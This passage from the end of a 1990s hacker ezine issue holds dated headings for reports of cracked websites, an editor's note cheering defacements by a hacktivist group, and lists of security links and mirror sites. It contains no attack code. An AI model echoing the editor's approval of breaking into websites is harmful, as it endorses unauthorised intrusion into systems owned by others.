was living in another city, so I asked him to send me a copy of the disk, and I would take a look at it. A few days later, an envelope arrived for me,
it contained a "photocopy" of the front and back side of the disk.
@HWA
SITE.1
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
From HNN rumours section, http://www.hackernews.com/, another busy weekend for some folks...
May 17th
contributed by Anonymous
Cracked
May 18th
From HNN rumours section, http://www.hackernews.com/
contributed by Anonymous
Cracked
The following sites have been reported to HNN as being
cracked.
May 19th
From HNN's rumours section http://www.hackernews.com/
contributed by Anonymous
Cracked
The following have been reported as Cracked
May 20th
From HNN's rumours section http://www.hackernews.com/
contributed by Anonymous
Cracked
The following sites have been reported to HNN as
cracked
May 21st
contributed by Anonymous
Cracked
The following have been reported to HNN as Cracked
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondents and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]